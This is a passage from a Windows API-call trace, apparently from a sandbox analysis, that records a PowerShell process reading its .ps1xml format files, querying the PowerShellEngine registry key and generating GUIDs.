	[0663.200] ReadFile (in: hFile=0x324, lpBuffer=0x322d4b8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12d3d8, lpOverlapped=0x0 | out: lpBuffer=0x322d4b8*, lpNumberOfBytesRead=0x12d3d8*=0xbce, lpOverlapped=0x0) returned 1
	[0663.200] ReadFile (in: hFile=0x324, lpBuffer=0x322cbee, nNumberOfBytesToRead=0x32, lpNumberOfBytesRead=0x12d3d8, lpOverlapped=0x0 | out: lpBuffer=0x322cbee*, lpNumberOfBytesRead=0x12d3d8*=0x0, lpOverlapped=0x0) returned 1
	[0663.200] ReadFile (in: hFile=0x324, lpBuffer=0x322d4b8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12d3d8, lpOverlapped=0x0 | out: lpBuffer=0x322d4b8*, lpNumberOfBytesRead=0x12d3d8*=0x0, lpOverlapped=0x0) returned 1
	[0663.200] CloseHandle (hObject=0x324) returned 1
	[0663.201] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml", nBufferLength=0x105, lpBuffer=0x12d120, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml", lpFilePart=0x0) returned 0x44
	[0663.201] SetErrorMode (uMode=0x1) returned 0x1
	[0663.201] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\dotnettypes.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x12d380 | out: lpFileInformation=0x12d380*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67e0582f, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67e0582f, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe5e29f95, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x11bce)) returned 1
	[0663.201] SetErrorMode (uMode=0x1) returned 0x1
	[0663.201] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml", nBufferLength=0x105, lpBuffer=0x12d0b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml", lpFilePart=0x0) returned 0x44
	[0663.201] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x12d468 | out: phkResult=0x12d468*=0x324) returned 0x0
	[0663.202] RegQueryValueExW (in: hKey=0x324, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x12d3ec, lpData=0x0, lpcbData=0x12d3e8*=0x0 | out: lpType=0x12d3ec*=0x1, lpData=0x0, lpcbData=0x12d3e8*=0x56) returned 0x0
	[0663.202] CoTaskMemAlloc (cb=0x5a) returned 0x3188f0
	[0663.202] RegQueryValueExW (in: hKey=0x324, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x12d3bc, lpData=0x3188f0, lpcbData=0x12d3b8*=0x56 | out: lpType=0x12d3bc*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x12d3b8*=0x56) returned 0x0
	[0663.202] CoTaskMemFree (pv=0x3188f0) 
	[0663.202] RegCloseKey (hKey=0x324) returned 0x0
	[0663.202] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml", nBufferLength=0x105, lpBuffer=0x12d0b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml", lpFilePart=0x0) returned 0x44
	[0663.202] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml", nBufferLength=0x105, lpBuffer=0x12cf60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml", lpFilePart=0x0) returned 0x44
	[0663.203] CoCreateGuid (in: pguid=0x12d690 | out: pguid=0x12d690*(Data1=0xd81b05f8, Data2=0xeaa6, Data3=0x48e4, Data4=([0]=0xa5, [1]=0xef, [2]=0xc1, [3]=0xb9, [4]=0xe2, [5]=0xde, [6]=0x22, [7]=0x80))) returned 0x0
	[0663.204] CoCreateGuid (in: pguid=0x12d690 | out: pguid=0x12d690*(Data1=0x3605ffcb, Data2=0x73d4, Data3=0x4869, Data4=([0]=0x88, [1]=0x6, [2]=0xa7, [3]=0x63, [4]=0x7c, [5]=0x9, [6]=0x79, [7]=0xcc))) returned 0x0
	[0663.204] CoCreateGuid (in: pguid=0x12d690 | out: pguid=0x12d690*(Data1=0xa25062fe, Data2=0x4bb, Data3=0x4fed, Data4=([0]=0x80, [1]=0x8d, [2]=0xfb, [3]=0xf2, [4]=0x65, [5]=0xb6, [6]=0xf5, [7]=0xc4))) returned 0x0
	[0663.204] CoCreateGuid (in: pguid=0x12d690 | out: pguid=0x12d690*(Data1=0xa7063de, Data2=0x2b74, Data3=0x424e, Data4=([0]=0x90, [1]=0x3f, [2]=0xf5, [3]=0xca, [4]=0xa5, [5]=0x4d, [6]=0x72, [7]=0x5b))) returned 0x0
	[0663.204] CoCreateGuid (in: pguid=0x12d690 | out: pguid=0x12d690*(Data1=0x1f3d58d, Data2=0x7241, Data3=0x4512, Data4=([0]=0x89, [1]=0x1d, [2]=0xc9, [3]=0x4f, [4]=0x49, [5]=0x7f, [6]=0x98, [7]=0x4c))) returned 0x0
	[0663.204] CoCreateGuid (in: pguid=0x12d690 | out: pguid=0x12d690*(Data1=0xebf33b13, Data2=0xb80, Data3=0x4aee, Data4=([0]=0xa5, [1]=0x6b, [2]=0x88, [3]=0x5a, [4]=0x6a, [5]=0x17, [6]=0xf6, [7]=0x72))) returned 0x0
	[0663.204] CoCreateGuid (in: pguid=0x12d690 | out: pguid=0x12d690*(Data1=0x4f0ca9c5, Data2=0x1e6f, Data3=0x4963, Data4=([0]=0xb2, [1]=0xd2, [2]=0xd5, [3]=0x95, [4]=0xf2, [5]=0xe4, [6]=0xc5, [7]=0x42))) returned 0x0
	[0663.205] CoCreateGuid (in: pguid=0x12d690 | out: pguid=0x12d690*(Data1=0xa72ed2c5, Data2=0xb165, Data3=0x47ec, Data4=([0]=0xa2, [1]=0xc2, [2]=0xb3, [3]=0x65, [4]=0x2f, [5]=0xc3, [6]=0xa, [7]=0xde))) returned 0x0
	[0663.205] CoCreateGuid (in: pguid=0x12d690 | out: pguid=0x12d690*(Data1=0xe324be2, Data2=0x450e, Data3=0x4dba, Data4=([0]=0x8c, [1]=0x17, [2]=0x8c, [3]=0xd3, [4]=0xc4, [5]=0xb7, [6]=0x1, [7]=0x95))) returned 0x0
	[0663.205] CoCreateGuid (in: pguid=0x12d690 | out: pguid=0x12d690*(Data1=0x89fe18a1, Data2=0x6986, Data3=0x4368, Data4=([0]=0xae, [1]=0x81, [2]=0xa2, [3]=0x6b, [4]=0xc8, [5]=0x8b, [6]=0x4, [7]=0xf2))) returned 0x0
	[0663.205] CoCreateGuid (in: pguid=0x12d690 | out: pguid=0x12d690*(Data1=0xa2220f84, Data2=0xaaba, Data3=0x4948, Data4=([0]=0xbd, [1]=0x23, [2]=0x3e, [3]=0xaa, [4]=0xe6, [5]=0xcf, [6]=0x9c, [7]=0x52))) returned 0x0
	[0663.205] CoCreateGuid (in: pguid=0x12d690 | out: pguid=0x12d690*(Data1=0xf1bc20a7, Data2=0x104, Data3=0x4b77, Data4=([0]=0xaf, [1]=0xdf, [2]=0xa4, [3]=0x74, [4]=0x3f, [5]=0x5d, [6]=0xd2, [7]=0xb5))) returned 0x0
	[0663.206] CoCreateGuid (in: pguid=0x12d690 | out: pguid=0x12d690*(Data1=0xc4bfbc47, Data2=0x327a, Data3=0x4cee, Data4=([0]=0xa6, [1]=0x19, [2]=0xff, [3]=0x99, [4]=0x2a, [5]=0x9, [6]=0x6d, [7]=0x3f))) returned 0x0
	[0663.206] CoCreateGuid (in: pguid=0x12d690 | out: pguid=0x12d690*(Data1=0x2e7dc611, Data2=0x718a, Data3=0x4b9e, Data4=([0]=0x9b, [1]=0x71, [2]=0x7a, [3]=0x70, [4]=0x1f, [5]=0xf9, [6]=0xe8, [7]=0xc))) returned 0x0
	[0663.206] CoCreateGuid (in: pguid=0x12d690 | out: pguid=0x12d690*(Data1=0x1d1d1a61, Data2=0xfefb, Data3=0x46ee, Data4=([0]=0xb9, [1]=0xce, [2]=0x18, [3]=0x6e, [4]=0xb8, [5]=0xc5, [6]=0x91, [7]=0xc8))) returned 0x0
	[0663.206] CoCreateGuid (in: pguid=0x12d690 | out: pguid=0x12d690*(Data1=0xd113f420, Data2=0xdb85, Data3=0x4c4b, Data4=([0]=0xb1, [1]=0x11, [2]=0x15, [3]=0x32, [4]=0x16, [5]=0xb8, [6]=0x6e, [7]=0xa5))) returned 0x0
	[0663.206] CoCreateGuid (in: pguid=0x12d690 | out: pguid=0x12d690*(Data1=0x53ba6ac4, Data2=0xbeea, Data3=0x4551, Data4=([0]=0x99, [1]=0x1c, [2]=0x4e, [3]=0xce, [4]=0x3b, [5]=0xd2, [6]=0x5b, [7]=0x53))) returned 0x0
	[0663.207] CoCreateGuid (in: pguid=0x12d690 | out: pguid=0x12d690*(Data1=0xbc5a2611, Data2=0x47b2, Data3=0x45dc, Data4=([0]=0xa1, [1]=0x7e, [2]=0x77, [3]=0x75, [4]=0x40, [5]=0xa2, [6]=0x94, [7]=0x6c))) returned 0x0
	[0663.207] CoCreateGuid (in: pguid=0x12d690 | out: pguid=0x12d690*(Data1=0x17de4e13, Data2=0x75fd, Data3=0x43c1, Data4=([0]=0x8c, [1]=0x38, [2]=0x85, [3]=0xf1, [4]=0x8c, [5]=0xb, [6]=0xe4, [7]=0x6d))) returned 0x0
	[0663.207] CoCreateGuid (in: pguid=0x12d690 | out: pguid=0x12d690*(Data1=0xfbd0e340, Data2=0xed9c, Data3=0x46fc, Data4=([0]=0xa3, [1]=0x15, [2]=0xda, [3]=0xa9, [4]=0x9b, [5]=0xe4, [6]=0x93, [7]=0xdd))) returned 0x0
	[0663.207] CoCreateGuid (in: pguid=0x12d690 | out: pguid=0x12d690*(Data1=0x7820b23b, Data2=0x96cf, Data3=0x42e6, Data4=([0]=0x9d, [1]=0xb2, [2]=0xfc, [3]=0x5a, [4]=0x15, [5]=0xc8, [6]=0xba, [7]=0xcf))) returned 0x0
	[0663.207] CoCreateGuid (in: pguid=0x12d690 | out: pguid=0x12d690*(Data1=0x2295e9c8, Data2=0x671b, Data3=0x49ff, Data4=([0]=0xae, [1]=0x52, [2]=0x45, [3]=0x37, [4]=0xdf, [5]=0x5a, [6]=0xd2, [7]=0x74))) returned 0x0
	[0663.207] CoCreateGuid (in: pguid=0x12d690 | out: pguid=0x12d690*(Data1=0xfd6fc197, Data2=0x3be, Data3=0x4f1d, Data4=([0]=0x95, [1]=0xe, [2]=0x93, [3]=0xaf, [4]=0xd3, [5]=0xd3, [6]=0x6e, [7]=0xd))) returned 0x0
	[0663.208] CoCreateGuid (in: pguid=0x12d690 | out: pguid=0x12d690*(Data1=0x51d15dab, Data2=0x5fdd, Data3=0x4281, Data4=([0]=0x89, [1]=0x1e, [2]=0x61, [3]=0x17, [4]=0xae, [5]=0x59, [6]=0xdc, [7]=0x2))) returned 0x0
	[0663.208] CoCreateGuid (in: pguid=0x12d690 | out: pguid=0x12d690*(Data1=0xc0f9bdc8, Data2=0x1e9c, Data3=0x4491, Data4=([0]=0x95, [1]=0x9e, [2]=0x9, [3]=0x20, [4]=0xd6, [5]=0xe8, [6]=0x94, [7]=0x6d))) returned 0x0
	[0663.208] CoCreateGuid (in: pguid=0x12d690 | out: pguid=0x12d690*(Data1=0x954f4d11, Data2=0x8d72, Data3=0x48f3, Data4=([0]=0xb1, [1]=0x52, [2]=0x10, [3]=0x89, [4]=0x5e, [5]=0x1a, [6]=0xa5, [7]=0x9d))) returned 0x0
	[0663.208] CoCreateGuid (in: pguid=0x12d690 | out: pguid=0x12d690*(Data1=0x4e1221b2, Data2=0x99b0, Data3=0x45de, Data4=([0]=0xa6, [1]=0x42, [2]=0xfc, [3]=0xd4, [4]=0xf5, [5]=0x8c, [6]=0xf5, [7]=0x17))) returned 0x0
	[0663.208] CoCreateGuid (in: pguid=0x12d690 | out: pguid=0x12d690*(Data1=0x334b85d3, Data2=0x5dfd, Data3=0x4892, Data4=([0]=0xa4, [1]=0xb9, [2]=0x29, [3]=0x87, [4]=0x73, [5]=0x6f, [6]=0x23, [7]=0x7f))) returned 0x0
	[0663.208] CoCreateGuid (in: pguid=0x12d690 | out: pguid=0x12d690*(Data1=0x7d4c5f8c, Data2=0x2ae3, Data3=0x4141, Data4=([0]=0xa6, [1]=0x64, [2]=0x13, [3]=0x7f, [4]=0x40, [5]=0x2b, [6]=0x5a, [7]=0x1b))) returned 0x0
	[0663.208] CoCreateGuid (in: pguid=0x12d690 | out: pguid=0x12d690*(Data1=0x7b361606, Data2=0x3549, Data3=0x438f, Data4=([0]=0x9a, [1]=0xdc, [2]=0x41, [3]=0x90, [4]=0xda, [5]=0xcc, [6]=0x98, [7]=0x67))) returned 0x0
	[0663.209] CoCreateGuid (in: pguid=0x12d690 | out: pguid=0x12d690*(Data1=0x4a08c55, Data2=0x686a, Data3=0x4301, Data4=([0]=0x9a, [1]=0xfc, [2]=0x9e, [3]=0x5e, [4]=0x81, [5]=0x27, [6]=0xe5, [7]=0xc0))) returned 0x0
	[0663.209] CoCreateGuid (in: pguid=0x12d690 | out: pguid=0x12d690*(Data1=0x8a3f15ce, Data2=0x66c8, Data3=0x4eda, Data4=([0]=0x83, [1]=0xba, [2]=0xc1, [3]=0x55, [4]=0x79, [5]=0xe9, [6]=0x5d, [7]=0xbf))) returned 0x0
	[0663.209] CoCreateGuid (in: pguid=0x12d690 | out: pguid=0x12d690*(Data1=0x60f64bd7, Data2=0x747b, Data3=0x4218, Data4=([0]=0x9f, [1]=0x3d, [2]=0x1a, [3]=0x57, [4]=0x68, [5]=0x24, [6]=0x2a, [7]=0xdd))) returned 0x0
	[0663.209] CoCreateGuid (in: pguid=0x12d690 | out: pguid=0x12d690*(Data1=0x5ede2cb8, Data2=0x837e, Data3=0x4636, Data4=([0]=0xa9, [1]=0x1, [2]=0x5d, [3]=0xe4, [4]=0x20, [5]=0x78, [6]=0xcf, [7]=0xf0))) returned 0x0
	[0663.209] CoCreateGuid (in: pguid=0x12d690 | out: pguid=0x12d690*(Data1=0x22f32c9b, Data2=0x45a5, Data3=0x4314, Data4=([0]=0x82, [1]=0xcc, [2]=0xb9, [3]=0xfa, [4]=0xbd, [5]=0x4e, [6]=0x26, [7]=0x99))) returned 0x0
	[0663.209] CoCreateGuid (in: pguid=0x12d690 | out: pguid=0x12d690*(Data1=0x36f893ce, Data2=0x6e81, Data3=0x4dba, Data4=([0]=0xa1, [1]=0x90, [2]=0x78, [3]=0x2c, [4]=0xe7, [5]=0x7a, [6]=0xd1, [7]=0x7a))) returned 0x0
	[0663.210] CoCreateGuid (in: pguid=0x12d690 | out: pguid=0x12d690*(Data1=0x687a08f3, Data2=0xa821, Data3=0x45a9, Data4=([0]=0x86, [1]=0x33, [2]=0x26, [3]=0xab, [4]=0x88, [5]=0x1a, [6]=0x66, [7]=0x1d))) returned 0x0
	[0663.210] CreateFileW (lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\filesystem.format.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x324
	[0663.210] GetFileType (hFile=0x324) returned 0x1
	[0663.210] SetErrorMode (uMode=0x1) returned 0x1
	[0663.210] GetFileType (hFile=0x324) returned 0x1
	[0663.211] ReadFile (in: hFile=0x324, lpBuffer=0x333dc48, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12d3d8, lpOverlapped=0x0 | out: lpBuffer=0x333dc48*, lpNumberOfBytesRead=0x12d3d8*=0x1000, lpOverlapped=0x0) returned 1
	[0663.211] ReadFile (in: hFile=0x324, lpBuffer=0x333dc48, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12d3d8, lpOverlapped=0x0 | out: lpBuffer=0x333dc48*, lpNumberOfBytesRead=0x12d3d8*=0x1000, lpOverlapped=0x0) returned 1
	[0663.212] ReadFile (in: hFile=0x324, lpBuffer=0x333dc48, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12d3d8, lpOverlapped=0x0 | out: lpBuffer=0x333dc48*, lpNumberOfBytesRead=0x12d3d8*=0x1000, lpOverlapped=0x0) returned 1
	[0663.212] ReadFile (in: hFile=0x324, lpBuffer=0x333dc48, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12d3d8, lpOverlapped=0x0 | out: lpBuffer=0x333dc48*, lpNumberOfBytesRead=0x12d3d8*=0x1000, lpOverlapped=0x0) returned 1
	[0663.212] ReadFile (in: hFile=0x324, lpBuffer=0x333dc48, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12d3d8, lpOverlapped=0x0 | out: lpBuffer=0x333dc48*, lpNumberOfBytesRead=0x12d3d8*=0x1000, lpOverlapped=0x0) returned 1
	[0663.212] ReadFile (in: hFile=0x324, lpBuffer=0x333dc48, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12d3d8, lpOverlapped=0x0 | out: lpBuffer=0x333dc48*, lpNumberOfBytesRead=0x12d3d8*=0x1000, lpOverlapped=0x0) returned 1
	[0663.213] ReadFile (in: hFile=0x324, lpBuffer=0x333dc48, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12d3d8, lpOverlapped=0x0 | out: lpBuffer=0x333dc48*, lpNumberOfBytesRead=0x12d3d8*=0x119, lpOverlapped=0x0) returned 1
	[0663.213] ReadFile (in: hFile=0x324, lpBuffer=0x333dc48, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12d3d8, lpOverlapped=0x0 | out: lpBuffer=0x333dc48*, lpNumberOfBytesRead=0x12d3d8*=0x0, lpOverlapped=0x0) returned 1
	[0663.213] CloseHandle (hObject=0x324) returned 1
	[0663.213] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml", nBufferLength=0x105, lpBuffer=0x12d120, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml", lpFilePart=0x0) returned 0x43
	[0663.213] SetErrorMode (uMode=0x1) returned 0x1
	[0663.213] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\filesystem.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x12d380 | out: lpFileInformation=0x12d380*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67e2b98c, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67e2b98c, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe5e76251, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x6119)) returned 1
	[0663.213] SetErrorMode (uMode=0x1) returned 0x1
	[0663.214] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml", nBufferLength=0x105, lpBuffer=0x12d0b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml", lpFilePart=0x0) returned 0x43
	[0663.214] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x12d468 | out: phkResult=0x12d468*=0x324) returned 0x0
	[0663.214] RegQueryValueExW (in: hKey=0x324, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x12d3ec, lpData=0x0, lpcbData=0x12d3e8*=0x0 | out: lpType=0x12d3ec*=0x1, lpData=0x0, lpcbData=0x12d3e8*=0x56) returned 0x0
	[0663.214] CoTaskMemAlloc (cb=0x5a) returned 0x3188f0
	[0663.214] RegQueryValueExW (in: hKey=0x324, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x12d3bc, lpData=0x3188f0, lpcbData=0x12d3b8*=0x56 | out: lpType=0x12d3bc*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x12d3b8*=0x56) returned 0x0
	[0663.214] CoTaskMemFree (pv=0x3188f0) 
	[0663.214] RegCloseKey (hKey=0x324) returned 0x0
	[0663.214] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml", nBufferLength=0x105, lpBuffer=0x12d0b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml", lpFilePart=0x0) returned 0x43
	[0663.215] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml", nBufferLength=0x105, lpBuffer=0x12cf60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml", lpFilePart=0x0) returned 0x43
	[0663.215] CoCreateGuid (in: pguid=0x12d690 | out: pguid=0x12d690*(Data1=0x2a898e78, Data2=0x81d6, Data3=0x4f91, Data4=([0]=0xb7, [1]=0x15, [2]=0xdb, [3]=0xc8, [4]=0x57, [5]=0x96, [6]=0xf, [7]=0xa1))) returned 0x0
	[0663.215] CoCreateGuid (in: pguid=0x12d690 | out: pguid=0x12d690*(Data1=0xc6af1b33, Data2=0xc400, Data3=0x4456, Data4=([0]=0x89, [1]=0x59, [2]=0x22, [3]=0xd4, [4]=0x27, [5]=0xaf, [6]=0x16, [7]=0xcf))) returned 0x0
	[0663.216] CoCreateGuid (in: pguid=0x12d690 | out: pguid=0x12d690*(Data1=0xf3efeb4f, Data2=0xad9d, Data3=0x41f3, Data4=([0]=0x81, [1]=0x8, [2]=0x86, [3]=0xbf, [4]=0xf6, [5]=0x45, [6]=0x8a, [7]=0xba))) returned 0x0
	[0663.216] CoCreateGuid (in: pguid=0x12d690 | out: pguid=0x12d690*(Data1=0x85fe6ead, Data2=0xb185, Data3=0x48b0, Data4=([0]=0xa0, [1]=0x52, [2]=0x3c, [3]=0x30, [4]=0xe8, [5]=0x96, [6]=0x70, [7]=0x2))) returned 0x0
	[0663.216] CreateFileW (lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\help.format.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x324
	[0663.216] GetFileType (hFile=0x324) returned 0x1
	[0663.216] SetErrorMode (uMode=0x1) returned 0x1
	[0663.216] GetFileType (hFile=0x324) returned 0x1
	[0663.216] ReadFile (in: hFile=0x324, lpBuffer=0x3399de8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12d3d8, lpOverlapped=0x0 | out: lpBuffer=0x3399de8*, lpNumberOfBytesRead=0x12d3d8*=0x1000, lpOverlapped=0x0) returned 1
	[0663.217] ReadFile (in: hFile=0x324, lpBuffer=0x3399de8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12d3d8, lpOverlapped=0x0 | out: lpBuffer=0x3399de8*, lpNumberOfBytesRead=0x12d3d8*=0x1000, lpOverlapped=0x0) returned 1
	[0663.218] ReadFile (in: hFile=0x324, lpBuffer=0x3399de8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12d3d8, lpOverlapped=0x0 | out: lpBuffer=0x3399de8*, lpNumberOfBytesRead=0x12d3d8*=0x1000, lpOverlapped=0x0) returned 1
	[0663.218] ReadFile (in: hFile=0x324, lpBuffer=0x3399de8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12d3d8, lpOverlapped=0x0 | out: lpBuffer=0x3399de8*, lpNumberOfBytesRead=0x12d3d8*=0x1000, lpOverlapped=0x0) returned 1
	[0663.218] ReadFile (in: hFile=0x324, lpBuffer=0x3399de8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12d3d8, lpOverlapped=0x0 | out: lpBuffer=0x3399de8*, lpNumberOfBytesRead=0x12d3d8*=0x1000, lpOverlapped=0x0) returned 1
	[0663.218] ReadFile (in: hFile=0x324, lpBuffer=0x3399de8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12d3d8, lpOverlapped=0x0 | out: lpBuffer=0x3399de8*, lpNumberOfBytesRead=0x12d3d8*=0x1000, lpOverlapped=0x0) returned 1
	[0663.218] ReadFile (in: hFile=0x324, lpBuffer=0x3399de8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12d3d8, lpOverlapped=0x0 | out: lpBuffer=0x3399de8*, lpNumberOfBytesRead=0x12d3d8*=0x1000, lpOverlapped=0x0) returned 1
	[0663.219] ReadFile (in: hFile=0x324, lpBuffer=0x3399de8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12d3d8, lpOverlapped=0x0 | out: lpBuffer=0x3399de8*, lpNumberOfBytesRead=0x12d3d8*=0x1000, lpOverlapped=0x0) returned 1
	[0663.220] ReadFile (in: hFile=0x324, lpBuffer=0x3399de8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12d3d8, lpOverlapped=0x0 | out: lpBuffer=0x3399de8*, lpNumberOfBytesRead=0x12d3d8*=0x1000, lpOverlapped=0x0) returned 1
	[0663.220] ReadFile (in: hFile=0x324, lpBuffer=0x3399de8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12d3d8, lpOverlapped=0x0 | out: lpBuffer=0x3399de8*, lpNumberOfBytesRead=0x12d3d8*=0x1000, lpOverlapped=0x0) returned 1
	[0663.220] ReadFile (in: hFile=0x324, lpBuffer=0x3399de8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12d3d8, lpOverlapped=0x0 | out: lpBuffer=0x3399de8*, lpNumberOfBytesRead=0x12d3d8*=0x1000, lpOverlapped=0x0) returned 1
	[0663.220] ReadFile (in: hFile=0x324, lpBuffer=0x3399de8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12d3d8, lpOverlapped=0x0 | out: lpBuffer=0x3399de8*, lpNumberOfBytesRead=0x12d3d8*=0x1000, lpOverlapped=0x0) returned 1
	[0663.220] ReadFile (in: hFile=0x324, lpBuffer=0x3399de8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12d3d8, lpOverlapped=0x0 | out: lpBuffer=0x3399de8*, lpNumberOfBytesRead=0x12d3d8*=0x1000, lpOverlapped=0x0) returned 1
	[0663.221] ReadFile (in: hFile=0x324, lpBuffer=0x3399de8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12d3d8, lpOverlapped=0x0 | out: lpBuffer=0x3399de8*, lpNumberOfBytesRead=0x12d3d8*=0x1000, lpOverlapped=0x0) returned 1
	[0663.221] ReadFile (in: hFile=0x324, lpBuffer=0x3399de8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12d3d8, lpOverlapped=0x0 | out: lpBuffer=0x3399de8*, lpNumberOfBytesRead=0x12d3d8*=0x1000, lpOverlapped=0x0) returned 1
	[0663.221] ReadFile (in: hFile=0x324, lpBuffer=0x3399de8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12d3d8, lpOverlapped=0x0 | out: lpBuffer=0x3399de8*, lpNumberOfBytesRead=0x12d3d8*=0x1000, lpOverlapped=0x0) returned 1
	[0663.224] ReadFile (in: hFile=0x324, lpBuffer=0x3399de8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12d3d8, lpOverlapped=0x0 | out: lpBuffer=0x3399de8*, lpNumberOfBytesRead=0x12d3d8*=0x1000, lpOverlapped=0x0) returned 1
	[0663.224] ReadFile (in: hFile=0x324, lpBuffer=0x3399de8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12d3d8, lpOverlapped=0x0 | out: lpBuffer=0x3399de8*, lpNumberOfBytesRead=0x12d3d8*=0x1000, lpOverlapped=0x0) returned 1
	[0663.224] ReadFile (in: hFile=0x324, lpBuffer=0x3399de8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12d3d8, lpOverlapped=0x0 | out: lpBuffer=0x3399de8*, lpNumberOfBytesRead=0x12d3d8*=0x1000, lpOverlapped=0x0) returned 1
